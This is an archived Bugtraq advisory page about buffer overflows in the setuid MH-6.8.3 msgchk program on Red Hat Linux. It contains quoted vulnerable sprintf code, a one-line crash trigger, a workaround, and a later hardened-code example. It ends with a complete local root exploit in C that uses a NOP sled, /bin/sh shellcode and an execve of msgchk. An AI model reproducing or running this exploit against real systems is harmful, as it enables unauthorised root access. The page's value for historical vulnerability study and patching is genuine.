Overflow in Mailhandler 6.8.3

Summary
Description: The suid MH-6.8.3 package has several buffer overflow bugs (among other holes). Also some BSD ruserpass() libc functions have the same hole.
Author: Matt Conover <shok@COBRA.ONLINEX.NET>
Compromise: root (local)
Vulnerable Systems: Redhat Linux 4.1, although you may have to specifically enable something. Also old versions of the *BSD libc function ruserpass().
Date: 26 July 1997
Notes: I appended Alan Cox's post about *BSD ruserpass() to the end. I also put some new information from Matt Conover (who sent the original post) in the addendum. Also note that the vulnerable programs are bbc, inc, mhn, msgchk, and popi. Redhat's package mh-6.8.3-13.i386.rpm installs /usr/bin/mh/inc and /usr/bin/mh/msgchk suid ROOT.
Details


Date: Sat, 26 Jul 1997 18:08:00 -0600
From: Matt Conover <shok@COBRA.ONLINEX.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Multiply bugs in MH-6.8.3 (Mail Handler program)

Okay, there is an overflow in MH-6.8.3, which is suid, which I THINK (not
sure) is installed, at least in Redhat 4.1+, by default (I think this
is installed within the mail package regardless of distribution, but I
never specifically installed it). This actually has a few overflows (I
haven't actually tested this but it looks quite obvious, you'll have to
test it yourself).


The only one I'm going to describe is the program 'msgchk', which is suid
(on my server it's installed by default in /usr/bin/mh/msgchk (in
function checkmail), you would also want to check /usr/lib/mh/msgchk.
(You ought to look through the code yourself..I notice quite a few
bugs..this program relies heavily on buffers and environmental variables)

This is pretty straightforward.
        char *hdir, buf[BUFSIZ], *tmp;

(About buf[BUFSIZ]: not sure the exact value..check the *.h files..for
test purposes if you try to overflow this...just use a size of 9999,
just to see if it segfaults.)

        hdir = getenv("HOME");
        if (hdir == NULL)
                hdir = ".";
        (void) sprintf(buf, "%s/.netrc", hdir);

Obviously it never even checks the value of hdir..so export your home
directory to something very large (if this doesn't work, they still
disobeyed something that libc specifically says not to do...they say to
use (can't remember the exact function) _secure_getenv,
_securelib_getenv (??) something like that..and they also said NOT to
define it to set the HOME to "." (the current path) for reasons that
someone could link .netrc to something and since it's suid... test this
yourself..I don't have too much time

Matt Conover (shok@onlinex.net -- Shok).

Date: Mon, 28 Jul 1997 23:27:48 +0100
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Multiply bugs in MH-6.8.3 (Mail Handler program)

> ruserpass(host,&user,&pass); is found in msgchk.c, in checkremote() or
> something like that... meaning that the host aren't vulnerable if not
> configured.. this is from a system where mh was installed w/o being

Also that means ruserpass() from libc isn't being used, which is probably
bad as most libc's have this fixed. (The hole above btw is in all the old
BSD derived libc's) but very very few current ones.

Date: Mon, 28 Jul 1997 22:51:48 -0600
From: Matt Conover 
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Multiply bugs in MH-6.8.3 (Mail Handler program)

No actually you're wrong...there are two different overflows...this is why
I said there are MULTIPLE bugs...I just only mentioned one..because that
one is used in checkmail() and it will be called, but there is an
exception:
static int  checkmail (user, home, datesw, notifysw, personal)
register char *user, *home;
int     datesw,
        notifysw,
        personal;
{
    int     mf,
            status;
    char    buffer[BUFSIZ];
    struct stat st;

    (void) sprintf (buffer, "%s/%s",
            mmdfldir[0] ? mmdfldir : home,
            mmdflfil[0] ? mmdflfil : user);

The exception is if mmdfldir[0] is true..otherwise this WILL get called
and this is directly in msgchk.c checkmail() NOT in ruserpass.c that is a
completely different overflow
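
Added example, not code from the posts or from MH itself: a hardened form of the sprintf(buffer, "%s/%s", ...) in checkmail() above, and of the "%s/.netrc" path built from HOME in the first post, that checks the length before writing the fixed-size buffer. The function names, the home_env parameter standing in for getenv("HOME"), and the sample inputs are assumptions.

```c
/* Hardened version of the sprintf(buffer, "%s/%s", dir, file) call in
 * msgchk.c checkmail(): the length is checked before the fixed-size
 * buffer is written, so an oversized HOME or user name is rejected. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Write "dir/file" into out[outsz]. Returns 0 on success, -1 if the result
 * would not fit; nothing is written past outsz and out is emptied on failure. */
int build_mail_path(char *out, size_t outsz, const char *dir, const char *file)
{
    if (out == NULL || outsz == 0 || dir == NULL || file == NULL)
        return -1;
    /* snprintf returns the length it wanted; >= outsz means it would have
     * overrun a plain sprintf() target of the same size. */
    int n = snprintf(out, outsz, "%s/%s", dir, file);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Mirrors the checkmail() selection: mmdfldir/mmdflfil override HOME and user.
 * home_env stands in for getenv("HOME") (assumed parameter); an unset HOME is
 * an error here instead of silently becoming "." as in the original. */
int mail_drop_path(char *out, size_t outsz,
                   const char *mmdfldir, const char *mmdflfil,
                   const char *home_env, const char *user)
{
    const char *dir  = (mmdfldir && mmdfldir[0]) ? mmdfldir : home_env;
    const char *file = (mmdflfil && mmdflfil[0]) ? mmdflfil : user;
    if (dir == NULL || dir[0] == '\0' || file == NULL)
        return -1;
    return build_mail_path(out, outsz, dir, file);
}

/* Constructed check: a 2000-byte HOME, the size of the posted trigger,
 * is refused (returns -1) instead of overflowing the BUFSIZ-sized buffer. */
int demo_oversized_home_rejected(void)
{
    char buf[1024];               /* stands in for char buffer[BUFSIZ] */
    char *big = malloc(2001);
    if (big == NULL) return -2;
    memset(big, 'A', 2000);
    big[2000] = '\0';
    int rc = mail_drop_path(buf, sizeof buf, "", "", big, "shok");
    free(big);
    return rc;
}
```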

Date: Tue, 12 May 1998 12:28:00 +0200
From: Jorge Hurtado Rojo <jhurtado@QUARKSS.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: buffer overflow in msgchk

Hi,

Some time ago it was published in bugtraq that a vulnerability existed in the msgchk program, which is installed suid root in redhat 5.0:

msgchk -host `perl -e 'print "A" x 2000'`

leads to a segfault, which can be exploited to get root access.

Workaround: chmod 000 /usr/bin/mh/msgchk, uninstall the package, compile it without RPOP / suid or use a wrapper (safeload).

The exploit follows.
(Sorry if this exploit was already posted. I have not seen it)

/* Almost everything here taken from Aleph One's Article about stack smashing (Phrack 49) */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET                 0
#define DEFAULT_BUFFER_SIZE            1018
#define NOP                            0x90

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Current stack pointer, i386 only (left in %eax as the return value) */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
    char *buff, *ptr;
    char *args[5];
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_sp() - offset;
    printf("Using address: 0x%lx\n", addr);

    /* fill the whole buffer with the guessed address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4) {
        buff[i]=addr & 0xFF;
        buff[i+1]=(addr >> 8) & 0xFF;
        buff[i+2]=(addr >> 16) & 0xFF;
        buff[i+3]=(addr >> 24) & 0xFF;
    }

    *(addr_ptr++) = addr;

    /* NOPs in the first half, shellcode in the middle */
    for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    args[0]="/usr/bin/mh/msgchk";
    args[1]="-host";
    args[2]=buff;
    args[3]=NULL;
    execve(args[0],args,NULL);
    return 0;
}

Jorge Hurtado
Quark Software & Services
http://www.quarkss.es
This page is part of Fyodor's exploit world.